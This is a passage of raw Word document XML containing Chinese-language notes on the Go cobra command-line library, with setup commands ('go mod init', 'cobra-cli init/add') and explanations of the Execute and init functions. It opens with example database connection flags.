      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-user=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173B064B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-password=1qaz@WSX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D2850" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-db=sca</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB06053" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>-lag=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B1013B" w14:textId="77777777" w:rsidR="003E7BB3" w:rsidRDefault="003E7BB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42811545" w14:textId="77777777" w:rsidR="003E7BB3" w:rsidRPr="003E7BB3" w:rsidRDefault="003E7BB3" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="256C3322" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="359" w:name="_Toc159779816"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>github.com/spf13/cobra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：命令行参数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="359"/>
    </w:p>
    <w:p w14:paraId="42F2772B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
      <w:hyperlink r:id="rId109" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://github.com/spf13/cobra</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6AD281F6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D0B64D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId110" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://github.com/spf13/cobra/blob/main/user_guide.md</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="69EE6C3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/spf13/cobra-cli/blob/main/README.md</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAFF7A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72E7E8AC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://blog.kelu.org/tech/2021/04/10/kubernetes-cobra.html#:~:text=golang%20Cobra%20%E5%8C%85%E7%AE%80%E5%8D%95%E4%BD%BF%E7%94%A8%201%20%E4%B8%80%E3%80%81%E6%A6%82%E5%BF%B5%20cobra%20%E4%B8%AD%E5%87%A0%E4%B8%AA%E4%B8%AA%E9%87%8D%E8%A6%81%E7%9A%84%E6%A6%82%E5%BF%B5%EF%BC%8C%E5%88%86%E5%88%AB%E6%98%AF%20commands%E3%80%81arguments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>,%E5%85%B7%E4%BD%93%E5%8A%9F%E8%83%BD%20...%204%20%E5%9B%9B%E3%80%81demo%20...%205%20%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99%20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D60A57" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F578F2F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D1CE747" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78E1432A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74DAA12F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02667CE4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化项目流程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D1F133" w14:textId="7CD4273F" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005C57DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go m</w:t>
      </w:r>
      <w:r w:rsidRPr="00B761DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">od init </w:t>
      </w:r>
      <w:r w:rsidR="00B761DD" w:rsidRPr="00B761DD">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>github.com/senranja</w:t>
      </w:r>
      <w:r w:rsidRPr="00B761DD">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>/PP</w:t>
      </w:r>
      <w:r w:rsidRPr="005C57DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">go mod init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包名来</w:t>
      </w:r>
      <w:r w:rsidRPr="005C57DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>初始化一个</w:t>
      </w:r>
      <w:r w:rsidRPr="005C57DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B0EE97" w14:textId="77777777" w:rsidR="005C57DA" w:rsidRDefault="005C57DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60CED290" w14:textId="6456BBA5" w:rsidR="005C57DA" w:rsidRDefault="005C57DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:t>obra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分的初始化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617A5C70" w14:textId="77777777" w:rsidR="005C57DA" w:rsidRDefault="005C57DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02BEB7B5" w14:textId="2E391F50" w:rsidR="005C57DA" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005C57DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">cobra-cli init  --license apache  --author "Steve Francia </w:t>
      </w:r>
      <w:hyperlink r:id="rId111" w:history="1">
        <w:r w:rsidRPr="005C57DA">
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
            <w:color w:val="FF0000"/>
            <w:highlight w:val="yellow"/>
          </w:rPr>
          <w:t>spf@spf13.com"</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>项目</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C213F10" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="005C57DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cobra-cli add serve</w:t>
      </w:r>
      <w:r w:rsidRPr="005C57DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加子命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427D0A14" w14:textId="77777777" w:rsidR="004C452C" w:rsidRPr="005C57DA" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指定父级命令创建子命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C57DA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>cobra-cli add create -p 'configCmd'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F86842" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构体</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C49CF8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>app/cmd/root.go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC6ACA3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要是围绕结构体</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> xxxCmd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Args</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Long</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Short</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系列、等内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D9BB30" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39EEEF56" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以自定义任意</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，反正得执行了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rootCmd.Execute()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E609A59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func Execute() error {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0E1594" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:bookmarkStart w:id="360" w:name="OLE_LINK1"/>
      <w:r>
        <w:t>rootCmd.Execute()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="360"/>
    </w:p>
    <w:p w14:paraId="665ED962" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC65FF0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>init</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B6423" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初始化的一个函数，在这里绑定各种</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>其中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的时有缩写的，没</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的是没有缩写的，没</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的通常</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>--radact</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>就可以表示没有什么值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451D6669" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>func init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE9FDE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>cobra.OnInitialize(initConfig)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> //</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>用来初始化日志级别相关的东西</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4477B355" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2799BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>我们知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>函数是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> Golang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>中初始化包的时候第一个调用的函数。在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd/root.go </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>中我们可以看到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>函数中调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> cobra.OnInitialize(initConfig)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>，也就是每当执行或者调用命令的时候，它都会先执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> init </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>函数中的所有函数，然后再执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> execute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>方法。该初始化可用于加载配置文件或用于构造函数等等，这完全依赖于我们应用的实际情况。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D42145E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B144E24" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>在初始化函数里面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> cobra.OnInitialize(initConfig) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> initConfig </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>这个函数，所有，当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> rootCmd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的执行方法</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> RUN: func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>运行的时候，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">rootCmd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>根命令就会首先运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> initConfig </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>函数，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>当所有的初始化函数执行完成后，才会执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> rootCmd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> RUN: func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>执行函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75067572" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
